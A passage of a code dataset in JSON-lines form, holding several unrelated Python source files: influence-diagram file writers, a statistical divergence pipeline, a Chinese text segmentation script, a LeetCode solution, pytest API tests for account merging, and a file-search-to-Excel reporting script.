graph\ndef write_uai_from_nx_graph(file_name, influence_diagram):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"ID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['node_type'] == 'C':\n chance_variables.append(n)\n elif influence_diagram.node[n]['node_type'] == 'D':\n decision_variables.append(n)\n elif influence_diagram.node[n]['node_type'] == 'U':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write domains of variables\n num_vars = len(chance_variables) + len(decision_variables)\n num_funcs = len(chance_variables) + len(value_nodes)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['node_type'] in ['C', 'D']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n\n # prob functions -> utility functions\n ### write scope of functions\n uai_file.write(\"{}\\n\".format(num_funcs))\n for var_id in chance_variables + value_nodes:\n if var_id in decision_variables: # only write probability functions\n continue\n scope_line = [len(influence_diagram.node[var_id]['scope'])] + influence_diagram.node[var_id]['scope']\n uai_file.write(\"{}\\n\".format(\" \".join(str(el) for el in scope_line)))\n\n uai_file.write(\"\\n\")\n ### write tables\n for var_id in chance_variables + value_nodes:\n table_length = influence_diagram.node[var_id]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[var_id]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\ndef write_erg_from_nx_graph(file_name, influence_diagram, temporal_ordering):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"ID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['type'] == 'chance':\n chance_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'decision':\n decision_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'value':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write num vars, domains, types\n num_vars = len(chance_variables) + len(decision_variables)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['type'] in ['chance', 'decision']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n var_types = ['d' if el in decision_variables else 'c' for el in range(num_vars)]\n uai_file.write(\"{}\\n\".format(\" \".join(var_types)))\n var_ordering = [temporal_ordering[el] for el in range(num_vars)]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in var_ordering])))\n\n ### write functions scopes\n num_funcs = len(chance_variables) + len(decision_variables) + len(value_nodes)\n uai_file.write(\"{}\\n\".format(num_funcs))\n for n in chance_variables + decision_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n scope_line = []\n if influence_diagram.node[n]['type'] == 'chance':\n scope_line.append('p')\n elif influence_diagram.node[n]['type'] == 'decision':\n scope_line.append('d')\n elif influence_diagram.node[n]['type'] == 'value':\n scope_line.append('u')\n else:\n assert False, \"unknown node type in influence diagram\"\n scope_line.append(len(influence_diagram.node[n]['scope']))\n scope_line.extend(influence_diagram.node[n]['scope'])\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in scope_line])))\n\n uai_file.write(\"\\n\")\n ### write tables\n for n in chance_variables + decision_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n if n in decision_variables:\n uai_file.write(\"{}\\n\".format(0))\n else:\n table_length = influence_diagram.node[n]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[n]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\ndef write_limid_from_nx_graph(file_name, influence_diagram):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"LIMID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['type'] == 'chance':\n chance_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'decision':\n decision_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'value':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write num vars, domains, types\n num_vars = len(chance_variables) + len(decision_variables)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['type'] in ['chance', 'decision']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n\n ### write function scopes, prob-dec-util\n uai_file.write(\"{}\\n\".format(len(chance_variables)))\n uai_file.write(\"{}\\n\".format(len(decision_variables)))\n uai_file.write(\"{}\\n\".format(len(value_nodes)))\n for n in chance_variables + decision_variables + value_nodes:\n scope_line = [len(influence_diagram.node[n]['scope'])]\n scope_line.extend(influence_diagram.node[n]['scope'])\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in scope_line])))\n\n uai_file.write(\"\\n\")\n ### write tables\n for n in chance_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n table_length = influence_diagram.node[n]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[n]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\n########################################################################################################################\n# write mini bucket heuristic\ndef write_mini_bucket_heuristic_from_info(file_name, heur_info):\n file_name = file_name if file_name.endswith(\".heur\") else file_name + \".heur\"\n heur_file = open(file_name, 'w')\n heur_file.write(\"{} {} {}\\n\".format(heur_info['num_var'], heur_info['num_msg'], heur_info['msg_id_start']))\n for var in range(heur_info['num_var']):\n if len(heur_info['bucket_msg'][var]) == 0:\n msg_str = \"\"\n else:\n msg_str = ' '.join([str(i) for i in heur_info['bucket_msg'][var]])\n heur_file.write(\"{} {} {}\\n\".format(var, len(heur_info['bucket_msg'][var]), msg_str ))\n heur_file.write(\"\\n\")\n\n for msg_id in range(heur_info['msg_id_start'], heur_info['msg_id_start']+heur_info['num_msg']):\n prob_msg = heur_info['msg_indexer'][msg_id].prob\n if type(prob_msg) != Factor:\n heur_file.write(\"0\\n\")\n heur_file.write(\"1\\n\")\n heur_file.write(\"{}\\n\".format(prob_msg))\n else:\n scope_str = \" \".join([str(el) for el in prob_msg.vars] )\n heur_file.write( \"{} {}\\n\".format(len(prob_msg.vars), scope_str) )\n heur_file.write(\"{}\\n\".format(prob_msg.numel()))\n table_str = \"\\n\".join(map(str, prob_msg.table.ravel(order='C')))\n heur_file.write( \"{}\\n\".format(table_str))\n\n value_msg = heur_info['msg_indexer'][msg_id].util\n if type(value_msg) != Factor:\n heur_file.write(\"0\\n\")\n heur_file.write(\"1\\n\")\n heur_file.write(\"{}\\n\".format(value_msg))\n else:\n scope_str = \" \".join([str(el) for el in value_msg.vars])\n heur_file.write(\"{} {}\\n\".format(len(value_msg.vars), scope_str))\n heur_file.write(\"{}\\n\".format(value_msg.numel()))\n table_str = \"\\n\".join(map(str, value_msg.table.ravel(order='C')))\n heur_file.write(\"{}\\n\".format(table_str))\n\n heur_file.write(\"\\n\")\n\n\n\n\n\n\n","repo_name":"junkyul/gmid-public","sub_path":"gmid/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":50872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35070368269","text":"\n\nimport math\nimport sys\n\nfrom LeucipPy import HtmlReportMaker as hrm\nfrom LeucipPy import WilliamsDivergenceMaker as wcm\nimport A0_Globals as globals\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime as dt\n#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\ndef getTime():\n now = dt.now()\n tm = now.strftime(\"%a %d%h%y-%H:%M:%S\")\n return tm\ndef openLog(logfile, msg):\n f = open(logfile, \"w\")\n f.write(getTime() + \" :\\tStarting log file for LeucipPy\\n\" + msg + '\\n')\n f.close()\n print(msg)\n\ndef log(logfile, msg):\n f = open(logfile, \"a\")\n f.write(getTime() + \" :\\t\" + msg + '\\n')\n f.close()\n print(msg)\n\ndef run(str_density,str_bins,str_iters):\n normed_corr = True\n density = float(str_density)\n iters = int(str_iters)\n bins = int(str_bins)\n randOrline = 'three'#'line' #rand or line or covar\n varis = [0,0.1,0.5,1,10]#,50,500]\n resample = True\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n html_file = \"Html/A01_Baseline_\"+randOrline+str(iters)+'_'+str(density)+\".html\"\n csv_file = \"Csv/A01_Baseline_\"+randOrline+str(iters)+'_'+str(density)+\".csv\"\n log_file = \"Log/A01_Baseline_\" + randOrline + str(iters)+'_'+str(density)+\".log\"\n rep = hrm.HtmlReportMaker(\"Williams Divergence From Trivial: Variance Comparison, Density=\" + str(density),html_file,cols=2)\n openLog(log_file,randOrline + str(iters))\n samples = [200,500,750,1000,1500,2000,5000,10000]\n fake_geos = []\n geo_pairs = []\n log(log_file,'Create samples')\n div_per_sample = {}\n\n for sample in samples:\n dic_fake_all = {}\n for vi in varis:\n log(log_file, 'samples=' + str(sample) + ' vi=' + str(vi))\n tag = str(vi) + '_'+ str(sample)\n fake_geos.append(tag+'A')\n fake_geos.append(tag+'B')\n geo_pairs.append([sample,vi,tag+'A',tag+'B'])\n dic_fake_all[tag+'A'] = []\n dic_fake_all[tag+'B'] = []\n for i in range(0,sample):\n l = i % 20\n count = 10 # samplesize\n dic_fake_all[tag+'A'].append(np.random.normal(l, int(count * vi)))\n dic_fake_all[tag+'B'].append(np.random.normal(l, int(count * vi)))\n #dic_fake_all[tag+'A'].append(np.random.normal(i, int(sample*vi)))\n #dic_fake_all[tag + 'B'].append(np.random.normal(i, int(sample * vi)))\n\n #print(dic_fake_all)\n df_sample = pd.DataFrame.from_dict(dic_fake_all)\n print(df_sample.columns)\n if str_density == '0':\n density = sample/(bins*bins)\n div_per_sample[sample] =wcm.WilliamsDivergenceMaker(df_sample,fake_geos,density=density,log=1,norm=normed_corr,pval_iters=iters,delay_load=True,p_resample=resample)\n print('######',sample)\n print(div_per_sample,sample)\n print('###############')\n # create a df with the coefficients\n dic_fake = {'stat': [],'p_value':[],'bins':[],'samples':[],'set':[],'density':[],'stat2':[],'random':[]}\n for sample,vi,geoA,geoB in geo_pairs:\n log(log_file, 'Creating divergence dataframe=' + str(sample) + geoA + ' ' + geoB)\n dm = div_per_sample[sample]\n div = dm.getCorrelation([geoA,geoB])\n stat, pvalue, A, D, B = div.stat,div.p_value,div.histAB,div.diffAB,div.convAB\n stat2 = math.log(stat*density)\n dic_fake['stat'].append(stat)\n dic_fake['stat2'].append(stat2)\n dic_fake['density'].append(density)\n dic_fake['p_value'].append(pvalue)\n dic_fake['bins'].append(dm.bins)\n dic_fake['samples'].append(sample)\n dic_fake['random'].append(vi)\n dic_fake['set'].append(geoA)\n # operation to normalise\n df_fake = pd.DataFrame.from_dict(dic_fake).round(4)\n df_fake.to_csv(csv_file,index=False)\n #add a seaborn lineplot for all bins\n log(log_file, 'Make line plots')\n rep.addLineComment('Compare coefficients')\n rep.changeColNumber(2)\n\n #rep.addPlot2d(df_fake,'scatter',geo_x='samples',geo_y='stat',hue='random',yrange=[0,1])\n #rep.addPlot2d(df_fake, 'scatter', geo_x='random', geo_y='stat', hue='samples',yrange=[0,1])\n #rep.addPlot2d(df_fake[df_fake['samples']==1000], 'seaborn', geo_x='random', geo_y='stat', hue='set',yrange=[0,1])\n\n ############################################\n ys = ['stat','p_value']\n for y in ys:\n fig, ax = plt.subplots()\n sns.lineplot(data=df_fake,x='random',y=y,hue='samples',palette='tab10')\n plt.title('Change at different randomness, per sample size')\n plt.legend(title='sample size',bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.ylim(0,1)\n rep.addPlotOnly(fig, ax)\n ############################################\n fig, ax = plt.subplots()\n sns.lineplot(data=df_fake, x='samples', y=y, hue='random',palette='tab10')\n plt.title('Change over sample size, per randomness')\n plt.legend(title='randomness',bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.ylim(0, 1)\n rep.addPlotOnly(fig, ax)\n ##############################\n\n rep.changeColNumber(3)\n rep.addLineComment('Data in the dataframes')\n for sample in samples:\n rep.addDataFrame(df_fake[df_fake['samples']==sample],title='Sample size=' + str(sample))\n\n log(log_file, 'Make distribution plots')\n rep.addLineComment('Plots of distributions')\n\n rep.changeColNumber(7)\n for sample,vi, geoA, geoB in geo_pairs:\n #rep.addLineComment(geoA + geoB, + 'Samples = ')\n if sample == 1000:\n log(log_file, 'Plots ' + geoA + ' ' + geoB)\n dm = div_per_sample[sample]\n cm_data = dm.data\n df_rand = dm.randomiseData(cm_data,[geoA, geoB])\n df_samp = dm.resampleData(cm_data,[geoA,geoB])\n print(df_samp)\n div = dm.getCorrelation([geoA, geoB])\n stat,pvalue,A,D,B = div.stat,div.p_value,div.histAB,div.diffAB,div.convAB\n mean,sd,hist = div.p_mean,div.p_std,div.p_hist\n maxV = max(np.max(A),np.max(B))\n rep.addPlot2d(cm_data, 'scatter', title=str(round(stat,3)) + ' orig vari=' + str(vi), geo_x=geoA, geo_y=geoB, hue=geoA)\n rep.addPlot2d(df_rand, 'scatter',title='rand, size=' + str(sample), geo_x=geoA, geo_y=geoB, hue=geoA)\n rep.addPlot2d(df_samp, 'scatter', title='resampled, size=' + str(sample), geo_x=geoA, geo_y=geoB, hue=geoA)\n if len(hist['divergence'])>0:\n crit_val = round(dm.getCriticalValue(geoA,geoB,0.95),3)\n rep.addPlot1d(hist,'histogram',geo_x='divergence',title='mean=' + str(round(mean,3)) + ' sd=' + str(round(sd,3)) + ' crit5%=' + str(crit_val))\n else:\n rep.addBoxComment(('No histogram calculated'))\n rep.addSurface(A,'Original Data',cmin=0,cmax=maxV,palette='Blues',colourbar=False)\n rep.addSurface(D, 'Difference Data stat=' + str(round(stat,3)) + ' pvalue=' + str(round(pvalue,3)), cmin=-1*maxV, cmax=maxV, palette='RdBu',colourbar=False)\n rep.addSurface(B, 'Convolved Data', cmin=0, cmax=maxV, palette='Reds',colourbar=False)\n\n log(log_file, 'Finally print out')\n rep.printReport()\n\n\nif __name__ == '__main__':\n globals()['run'](sys.argv[1],sys.argv[2],sys.argv[3])\n","repo_name":"RachelAlcraft/LeucipPipelines","sub_path":"Pipelines/DivergenceMetric/A01_CompareBaselinesVariance_OutProc.py","file_name":"A01_CompareBaselinesVariance_OutProc.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16868835660","text":"# -*- coding: UTF-8 -*-\n# -*- Author: Jacklanda\nimport jieba\n\nimport io, re\n\n# 加载自己的自己的词库\njieba.load_userdict(\"./stopword.txt\")\n\ndef main():\n with io.open('./Pos-train.txt','r',encoding='utf-8') as content:\n for line in content:\n seg_list = jieba.cut(line)\n # print('/'.join(seg_list))\n with io.open('./seg2.txt', 'a+', encoding='utf-8') as output:\n line_word = ' '. join(seg_list)\n content = re.findall('[\\u4e00-\\u9fa5]+', line_word)\n print(content)\n output.write(' '.join(content))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"jacklanda/failled-experiment","sub_path":"src/dataAnal/test/test_jieba.py","file_name":"test_jieba.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39658747000","text":"from datetime import time\nimport unittest\nfrom typing import List\nfrom pprint import pprint\n\n\nclass Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n return duration + sum(min(timeSeries[i+1]-timeSeries[i], duration) for i in range(len(timeSeries)-1))\n\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n timeSeries = [1, 4]\n duration = 2\n expected = 4\n self.assertEqual(sol.findPoisonedDuration(\n timeSeries, duration), expected)\n\n def test_case_2(self):\n sol = Solution()\n timeSeries = [1, 2]\n duration = 2\n expected = 3\n self.assertEqual(sol.findPoisonedDuration(\n timeSeries, duration), expected)\n\n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/cn/495_teemo_attacking.py","file_name":"495_teemo_attacking.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1846985200","text":"import pytest\nfrom utils.requesttool import request\nfrom utils.pysql import PyMySQL\nfrom utils.loaddata import LoadEnvData\nfrom utils.requesttool import loadcase\nfrom utils.log import callback_log,combinelogger\nfrom data.combine_returncode_enum import CombineReturnCodeEnum\n\ncombinelist=[]\n\n@LoadEnvData(host=\"test_combineapi\",path=\"combine_path\",data=\"combine.yml\")\nclass Combine():\n def __init__(self):\n #从数据库选取一个有手机的custid作为父账号\n self.custid=self.cf_presetvar.get('combine','cust_unbind')\n\n # 从数据库选取一个没有手机的账户,作为子账号\n self.custid_no_phone=self.cf_presetvar.get('combine','cust_unbind_weixin')\n\n @loadcase(combinelist)\n def params_invalid(self):\n '''参数校验-必填字段为空'''\n #custid_parent为空\n\n request_data=self.initparams\n request_data['custid_parent']=''\n\n status_error_code = CombineReturnCodeEnum.PARAM_ERROR_PREFIX.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_notexist(self):\n '''父账号或子账号cust_id不存在'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent']= '123123123'\n request_data['custid_child'] = '321321321'\n status_error_code = CombineReturnCodeEnum.CUSTID_IS_NOT_EXIST.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_nophone(self):\n '''父账号未绑定手机'''\n request_data = dict(self.initparams)\n\n sql = \"select cust_id from customer where cust_id>0 and cust_mobile='' limit 1\"\n request_data['custid_parent']=PyMySQL().mysqlget(sql)\n status_error_code=CombineReturnCodeEnum.CUSTID_NOT_BIND_MOBILE.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_child_bindphone(self):\n '''子账号已绑定手机'''\n request_data = dict(self.initparams)\n\n sql = \"select cust_id from customer where cust_id>0 and cust_mobile<>'' limit 5,1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n request_data['custid_parent'] = self.custid\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_MOBILE.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_already_bind_wechat(self):\n '''父账号已绑定微信'''\n request_data = dict(self.initparams)\n #从customer_combine中选择一个cust_id\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third_wechat where cust_bind_type=2) and cust_mobile<>'' limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n #未绑定微信的cust_id\n sql=\"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_third_wechat where cust_bind_type=1) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_WEIXIN.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_already_bind_qq(self):\n '''父账号已绑定qq'''\n request_data = dict(self.initparams)\n thirdid=6 #qq\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third where third_id=6) and cust_mobile<>'' limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third where third_id=6) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_WEIXIN.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_child_already_combine(self):\n '''子账号发生过绑定'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent'] = self.custid\n # 发生过绑定的cust_id\n sql = \"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_combine ) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_COMBINE_REPEAT_VERIFY_FAIL.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_apply_cancel_deny(self):\n '''提交注销申请的账户不能合并'''\n request_data = dict(self.initparams)\n\n # 注销申请的cust_id\n sql = \"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_cancel_apply where cust_mobile<>'' ) and cust_status!=-1 limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_APPLY_CANCEL.value\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_enterprise_deny(self):\n '''企业账号不能合并'''\n request_data = dict(self.initparams)\n\n #父账号为企业账号\n custid=self.cf_presetvar.get('combine','enterprise_cust_id') #预定义变量中获取企业账号\n request_data['custid_parent'] = custid\n\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ENTERPRISE_VERIFY_FAIL.value\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def combine_success(self):\n '''合并微信账号成功'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent'] = self.custid\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.SUCCESS.value\n return request_data, status_error_code\n\n\ndef teardown_module():\n '''用例结果数据销毁'''\n combine=Combine()\n custidlist=[combine.custid,combine.custid_no_phone]\n for custid in custidlist:\n data={'cust_id':custid}\n PyMySQL().mysqldel('customer_combine',data)\n\ncombine = Combine()\ndatalist = [ele(combine) for ele in combinelist]\n\n@pytest.fixture(params=datalist)\ndef pyfixture(request):\n return request.param\n\n@pytest.mark.combine\n@pytest.mark.flaky(reruns=1, reruns_delay=5)\ndef test_Combine(pyfixture,hook=callback_log):\n # 请求\n url = Combine.url\n data = pyfixture[0]\n res = request(url=url, data=data)\n # print(data)\n if hook: # 写日志,写在assert断言之前\n callback_log(url, data, res, combinelogger,return_msg=pyfixture[1][1])\n\n assert res['return_code'] == pyfixture[1][0]","repo_name":"gitchenping/apitest","sub_path":"testcase/Combineapi/Combine_test.py","file_name":"Combine_test.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43328558055","text":"from search import Search\nfrom datetime import datetime, timezone\nimport json\nimport pandas as pd\nimport numpy as np\nimport time\nimport openpyxl\nfrom openpyxl.styles import Font, Fill\n\n# Global variables\ndf: pd.DataFrame\nreport_file = f\"file-search-results-{datetime.today().strftime('%Y-%m-%d')}.xlsx\"\nworkbook_objects = []\n\n# Customize Search Settings\n# Create instance of Search object\nsearch = Search(search_path='/users/kyleking/projects/file_system_utilities',\n recursive=True,\n return_all=True,\n exclude=['.map', 'venv', '.pyc', '__pycache__', '.DS_Store', 'ignore', '.idea', 'git'],\n include=[])\n\n\ndef get_search_results():\n global df\n df = pd.DataFrame(search.execute())\n df = pd.concat([df, df[\"results\"].apply(pd.Series)], axis=1)\n df = df.drop(['results'], axis=1)\n\n\ndef transform_results():\n fix_missing_values()\n add_size_classification()\n add_file_aging_classification()\n\n\ndef generate_report_data():\n # Output (order of list prior to export will dictate the sheet order)\n add_about_page()\n add_search_results()\n\n add_pivot_by_file_aging_and_type()\n add_pivot_by_file_size()\n\n add_pivot_by_folder_aging_and_type()\n add_pivot_by_folder_size()\n\n export_to_excel(report_file)\n update_about_page()\n\n\ndef fix_missing_values():\n # Fix Missing/NaN values\n df['file_mime_type'] = df['file_mime_type'].fillna('Not Available')\n\n\ndef add_size_classification():\n conditions = [\n (df['size_mb'] <= 1), # Very Small [<1 MB]\n (df['size_mb'] <= 10), # Small [1-10 MB]\n (df['size_mb'] <= 100), # Medium [10-100 MB]\n (df['size_mb'] <= 1000), # Large [100-1000 MB]\n (df['size_mb'] > 1000), # Very Large [> 1000 MB]\n ]\n\n choices = ['Very Small [<1 MB]',\n 'Small [1-10 MB]',\n 'Medium [10-100 MB]',\n 'Large [100-1000 MB]',\n 'Very Large [> 1000 MB]']\n\n df['size_classification'] = np.select(conditions, choices)\n\n\ndef add_file_aging_classification():\n conditions = [\n (df['age'] <= 1), # <=1 Year\n (df['age'] <= 3), # 1-3 Years\n (df['age'] <= 5), # 3-5 Years\n (df['age'] <= 7), # 5-7 Years\n (df['age'] <= 10), # 7-10 Years\n (df['age'] <= 15), # 10-15 Years\n (df['age'] <= 20), # 15-20 Years\n (df['age'] <= 30), # 20-30 Years\n (df['age'] > 30), # 30+ Years\n\n ]\n\n choices = ['<=1 Year',\n '1-3 Years',\n '3-5 Years',\n '5-7 Years',\n '7-10 Years',\n '10-15 Years',\n '15-20 Years',\n '20-30 Years',\n '30+ Years']\n\n df['aging_tier'] = np.select(conditions, choices)\n # print(tabulate(output, headers='keys', tablefmt='psql'))\n\n\ndef add_pivot_by_file_aging_and_type():\n pivot = pd.pivot_table(data=df,\n index=['file_extension', 'file_mime_type', ],\n columns=['aging_tier'],\n aggfunc=['count'],\n values=['file'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'File Aging Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_folder_aging_and_type():\n pivot = pd.pivot_table(data=df,\n index=['folder'],\n columns=['aging_tier'],\n aggfunc=['count'],\n values=['full_path'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'Folder Aging Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_file_size():\n pivot = pd.pivot_table(data=df,\n index=['file_extension', 'file_mime_type', ],\n columns=['size_classification'],\n aggfunc=['count'],\n values=['file'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'File Size Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_folder_size():\n pivot = pd.pivot_table(data=df,\n index=['folder'],\n columns=['size_classification'],\n aggfunc=['count'],\n values=['full_path'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'Folder Size Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_search_results():\n workbook_objects.append({'SheetName': 'Search Results',\n 'Object': df,\n 'StartRow': 0,\n 'StartCol': 0\n })\n\n\ndef add_about_page():\n search_criteria = {\n 'Search Criteria': search.to_dict()\n }\n\n workbook_objects.append({'SheetName': 'About',\n 'Object': pd.DataFrame(search_criteria),\n 'StartRow': 6,\n 'StartCol': 1\n })\n\n\ndef update_about_page():\n # TODO: this needs some improvement; not sure openpyxl is the way to go here\n workbook = openpyxl.load_workbook(report_file)\n worksheet = workbook['About']\n worksheet['B2'] = 'Search Results'\n worksheet['B3'] = 'Purpose:'\n worksheet['C3'] = 'Show all results of a file system search based on customized search criteria'\n worksheet['B4'] = 'Run Date'\n worksheet['C4'] = datetime.today()\n worksheet['B5'] = 'Total Results Found:'\n worksheet['C5'] = str(df.shape[0]) # row count\n\n c = worksheet['B2']\n c.font = Font(size=22, bold=True)\n workbook.save(report_file)\n\n\ndef export_to_excel(report_name):\n # utc is not supported in Excel so need to remove from dataframe during this step\n df['created_dt'] = df['created_dt'].dt.tz_localize(None)\n df['modified_dt'] = df['modified_dt'].dt.tz_localize(None)\n df['opened_dt'] = df['opened_dt'].dt.tz_localize(None)\n\n workbook_objects.append({'SheetName': 'Search Results',\n 'Object': df,\n 'StartRow': 0,\n 'StartCol': 0\n })\n\n with pd.ExcelWriter(report_name) as writer:\n for obj in workbook_objects:\n obj['Object'].to_excel(writer, sheet_name=obj['SheetName'],\n startrow=obj['StartRow'],\n startcol=obj['StartCol'])\n\n sheet = writer.sheets['About']\n sheet.set_column('B:C', 40)\n\n\nif __name__ == '__main__':\n get_search_results()\n transform_results()\n generate_report_data()\n\n\n\n\n\n","repo_name":"kking423/file_system_utilities","sub_path":"examples/search_to_xlsx.py","file_name":"search_to_xlsx.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6487208443","text":"import random\nfrom typing import Optional\n\nimport matplotlib\nimport numpy as np\nimport tensorflow as tf\nimport sys\nfrom time import *\nimport os\n\nfrom matplotlib import pyplot as plt\n\nPROJECT_ROOT = os.path.abspath(os.getcwd() + os.sep + os.pardir + os.sep + os.pardir)\nsys.path.insert(0, PROJECT_ROOT)\n\nfrom IRESNs_tensorflow.initializers import *\n\nPATIENCE = 5\nEPOCHS = 